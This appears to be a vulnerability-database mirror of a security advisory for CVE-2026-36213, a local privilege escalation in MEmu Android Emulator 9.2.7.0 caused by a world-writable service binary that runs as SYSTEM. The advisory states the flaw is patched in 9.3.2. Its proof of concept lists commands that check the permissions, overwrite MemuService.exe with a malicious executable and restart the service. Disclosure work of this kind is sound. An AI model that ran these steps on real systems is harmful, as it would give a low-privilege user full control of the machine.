Lucene search
K

📄 MEmu Android Emulator 9.2.7.0 Privilege Escalation

🗓️ 11 Jun 2026 00:00:00Reported by Mohammad Hossein Ashofte YazdiType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 4 Views

Local privilege escalation in MEmu Emulator 9.2.7.0 via insecure MemuService.exe; fixed in 9.3.2.

Code
# CVE-2026-36213
    CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2
    # CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE
    
    ![CVE](https://img.shields.io/badge/CVE-2026--36213-red)
    ![CVSS](https://img.shields.io/badge/CVSS-7.8%20HIGH-orange)
    ![Status](https://img.shields.io/badge/Patched-9.3.2-green)
    ![Platform](https://img.shields.io/badge/Platform-Windows-blue)
    
    ## Summary
    
    A Local Privilege Escalation (LPE) vulnerability in **MEmu Android Emulator 9.2.7.0**.  
    The service `MEmuSVC` runs as `NT AUTHORITY\SYSTEM` while its binary is writable by any local user, allowing full system compromise.
    
    | Field | Details |
    |-------|---------|
    | **CVE** | CVE-2026-36213 |
    | **Product** | MEmu Android Emulator (MicroVirt) |
    | **Affected Version** | 9.2.7.0 and earlier |
    | **Fixed Version** | 9.3.2 |
    | **CWE** | CWE-732 / CWE-269 |
    | **CVSS v3.1** | 7.8 HIGH `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
    | **ATT&CK** | [T1574.010](https://attack.mitre.org/techniques/T1574/010/) |
    
    ---
    
    ## Vulnerability
    
    `MEmuService.exe` is installed as a SYSTEM-level Windows service with insecure NTFS permissions:
    
    ```cmd
    icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
    
    BUILTIN\Users:(F)   ← Any local user has Full Control
    Everyone:(F)        ← World-writable binar
    ```
    ## Proof of Concept
    :: Step 1 - Verify vulnerable permissions
    ```cmd
    icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
    ```
    
    :: Step 2 - Replace binary (as low-priv user)
    ```cmd
    copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
    ```
    
    :: Step 3 - Restart service
    ```cmd
    sc stop MEmuSVC && sc start MEmuSVC
    ```
    
    :: Result: malicious.exe runs as NT AUTHORITY\SYSTEM
    
    ## Detection Script
    Available at: https://github.com/sec-zone/Hijack-service-binaries
    
    ## Disclaimer
    This research was conducted for educational purposes under responsible disclosure policy.  
    The author is not responsible for any misuse of this information.
    
    ## Researcher
    Name: Mohammad Hossein Ashofte Yazdi  
    Linkedin: https://www.linkedin.com/in/seczone64  
    Twitter: @sec_zone64  
    Email: [email protected]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation